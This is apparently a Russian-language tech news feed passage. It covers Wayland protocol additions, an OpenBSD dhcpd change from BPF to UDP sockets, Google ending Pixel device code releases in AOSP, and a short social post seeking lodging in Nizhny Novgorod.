• "ext-transient-seat" - предназначен для создания временных независимых сеансов (seat), рассчитанных на использование вместе с виртуальными устройствами ввода. Например, при реализации возможности подключения к удалённому рабочему столу протокол позволяет создать для каждого пользователя отдельный сеанс с виртуальными клавиатурой и мышью.
• "xdg-toplevel-drag" - расширяет механизм "drag & drop" возможностью прикрепления окон верхнего уровня к операции перемещения, что может быть использовано, например, для организации перетаскивания мышью панелей инструментов или вкладок браузера. Новый протокол позволяет создавать отсоединяемые части окна, которые при перетаскивании из этого окна становятся новыми окнами и могут перемещаться поверх существующего окна перед повторным прикреплением.
• "xdg-dialog" - позволяет назначать поверхностям верхнего уровня признаки, специфичные для диалоговых окон, например, можно создавать модальные диалоги, которые блокируют взаимодействие пользователя с остальной частью интерфейса.
• "linux-drm-syncobj" - предоставляет инструменты для явной синхронизации буферов при помощи объектов синхронизации DRM (Direct Rendering Manager). Предполагается, что в контексте синхронизации при отрисовке в буфер предложенный протокол позволит улучшить работу с драйверами на базе графических API Vulkan и OpenGL (реализация базируется на обработчиках в драйверах). Новый протокол даёт возможность убедиться, что операция отрисовки в буфер завершена до того, как композитный менеджер отобразит данный буфер.
• alpha-modifier, позволяющий клиентам менять уровень прозрачности поверхности и выносить операции по обеспечению прозрачности на сторону композитного сервера, который в свою очередь может переадресовать эти операции KMS.
• xdg-toplevel-icon - привязка пиктограммы к окну верхнего уровня.
• ext-image-capture-source и ext-image-copy-capture - организация захвата контента, выводимого на экран.
• xdg-system-bell - позволяет выводить системный сигнал, который может использоваться, например, как предупреждение в эмуляторе терминалов. Форма вывода сигнала определяется на усмотрение композитного менеджера, это может быть не только звук, но визуальный отклик.
• fifo - реализует FIFO-механизм (первым пришёл - первым ушёл) обработки очереди обновления содержимого отображаемой поверхности. С практической стороны протокол позволяет при выводе использовать ожидание завершения вертикальной развёртки (vblank) вместо использования callback-вызовов при каждой готовности отобразить новый кадр, что решает проблему с высокой нагрузкой на GPU при использовании VSync.
• commit-timing - позволяет привязать ограничение времени к содержимому поверхности (композитный сервер должен отобразить изменение контента по возможности через указанное время, но не раньше).
• ext-data-control - позволяет привилегированным клиентам управлять обработкой данных, например, для реализации менеджеров буфера обмена.
• ext-workspace - реализует концепцию виртуальных рабочих столов и предлагает события с информацией о состоянии рабочих столов, а также возможности для активации и деактивации рабочих столов. Протокол может применяться для создания панелей и индикаторов, выводящих список доступных виртуальных рабочих столов и позволяющих переключаться между ними.
• color-management - предоставляет возможности для управления цветом и поддержки расширенного динамического диапазона яркости (HDR, High Dynamic Range). При помощи добавленного расширения клиентские приложения могут получать информацию о связанных с цветопередачей свойствах устройств вывода и передавать композитному серверу данные о свойствах цветопередачи собственного контента. В композитном сервере данная информация может использоваться для автоматического управления цветом при отображении содержимого на различных устройствах вывода, например, для преобразования контента в предоставление, подходящее для отображения на HDR-мониторах. Для описания цветовых пространств используются профили ICC.
• xdg-toplevel-tag - позволяет Wayland-клиентам прикреплять теги к поверхностями верхнего уровня, которые композитный сервер может использовать для идентификации окон после перезапуска приложения (например, приложение может выставить теги "main window" и "settings" для основного окна и окна с настройками). Подобная идентификация полезна для восстановления позиции, размера и свойств окон после перезапуска, а также для определения особых правил для отдельных видов окон.
• color-representation - определение цветового представления Wayland-поверхности. Wayland-клиенты могут передавать метаданные, необходимые для определения прозрачности, цветовой модели, субдискретизации и диапазона квантования, и применяемые при преобразовании буфера с данными, соответствующими цветовой модели YCbCr, в представление RGB.

Протоколы, разрабатываемые в ветке "unstable":

• "fullscreen-shell" - управление работой в полноэкранном режиме.
• "input-method" - обработка методов ввода.
• "idle-inhibit" - блокировка запуска скринсейвера (экранной заставки).
• "input-timestamps" - временные метки для событий ввода.
• "keyboard-shortcuts-inhibit" - управление прикреплением клавиатурных комбинаций и горячих клавиш.
• "linux-explicit-synchronization" - специфичный для Linux механизм синхронизации буферов в привязке к поверхности.
• "pointer-gestures" - управление с сенсорных экранов.
• "pointer constraints" - ограничения указателей (блокировка).
• "primary-selection" - по аналогии с X11 обеспечивает работу первичного буфера обмена (primary selection), вставка информации из которого обычно осуществляется средней кнопкой мыши.
• "relative pointer events" - относительные события указателей.
• "text-input" - организация ввода текста.
• "xdg-foreign" - интерфейс взаимодействия с поверхностями "соседнего" клиента.
• "xdg-decoration" - отрисовка декораций окон на стороне сервера.
• "xdg-output" - дополнительные сведения о видеовыходе (используется для дробного масштабирования).
• "xwayland-keyboard-grab" - захват ввода в приложениях XWayland.

Друже! Кто из Нижнего (не мира, но Новгорода). Поможите вписать камрада @yakhtov на ночь 😉 Не в смысле прям к себе, хостел и посуточно тож сгодится, но поиском всё занято и засрано «авитологами» 😔

@rf
@ru@lor.sh
@Russia
@russian_mastodon

dhcpd(8): use UDP sockets instead of BPF

The motivation is summarized as,

tl;dr this replaces bpf with udp sockets in dhcpd, mostly to make it
better at replying with the ip that requests were sent to.

and the full message, with the subject dhcpd(8): use UDP sockets instead of BPF reads,

List:       openbsd-tech
Subject:    dhcpd(8): use UDP sockets instead of BPF
From:       David Gwynne <david () gwynne ! id ! au>
Date:       2025-06-13 3:29:20

tl;dr this replaces bpf with udp sockets in dhcpd, mostly to make it
better at replying with the ip that requests were sent to.

ive been hacking on this because of a problem at work, which i want to
solve by setting up a bunch of "anycast" dhcp servers. ie, i want to
have multiple dhcpd on separate servers with the same IP assigned
as an alias on all of them.

Read more…

Google прекратил публикацию кода для поддержки устройств Pixel в репозитории с кодом Android

Отмечается, что отсутствие подобных компонентов существенно усложнит разработку альтернативных сборок Android. Если раньше разработчики альтернативных прошивок могли легко собрать и загрузить AOSP для устройств Pixel, то теперь им придётся выполнять обратный инжиниринг бинарных файлов из прошивок для определения изменений по сравнению с ранее опубликованными спецификациями DeviceTree. В текущем виде Android 16 не может быть собран из репозитория AOSP для смартфонов Pixel, используя только официально предоставляемые компоненты.

В AOSP продолжена публикация кода ядра Linux для поддержки оборудования, но теперь эти изменения доступны в форме среза без истории коммитов. AOSP также можно использовать для формирования общих сборок GSI (Generic System Image), но для их адаптации к конкретным устройствам требуются DeviceTree-файлы, которые теперь не публикуются для смартфонов Google Pixel. DeviceTree определяет спецификацию аппаратной начинки, используемые периферийные устройства и компоненты, необходимые для сборки образа прошивки для конкретного устройства.

Разработчики проекта GrapheneOS, развивающего редакцию Android с изменениями для усиления безопасности и обеспечения конфиденциальности, сообщили, что в апреле по неофициальным каналам до них дошли сведения о том, что в Google началась работа по урезанию AOSP, и первым шагом станет прекращение публикации кода для поддержки устройств в Android 16. На этом фоне появились спекуляции на тему прекращения поддержки репозитория AOSP.

Сэнг Чау (Seang Chau), вице-президент Google, отвечающий за платформу Android, ответил, что слухи относительно сворачивания репозитория AOSP не соответствуют действительности. Код продолжит публиковаться в AOSP и Android останется открытой платформой, пригодной для адаптации к новым устройствам, SoC и аппаратным архитектурам. При этом AOSP не хватает гибкого, настраиваемого и дешёвого эталонного устройства для тестирования системы, не привязанного к конкретным аппаратным устройствам, таким как Google Pixel. В качестве такого эталонного устройства для AOSP предлагается использовать открытое виртуальное устройство Cuttlefish. Кроме того, для тестирования и разработки Android оставлена возможность использования базовых образов GSI (Generic System Image), собранных из AOSP и не привязанных к конкретным устройствам.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63399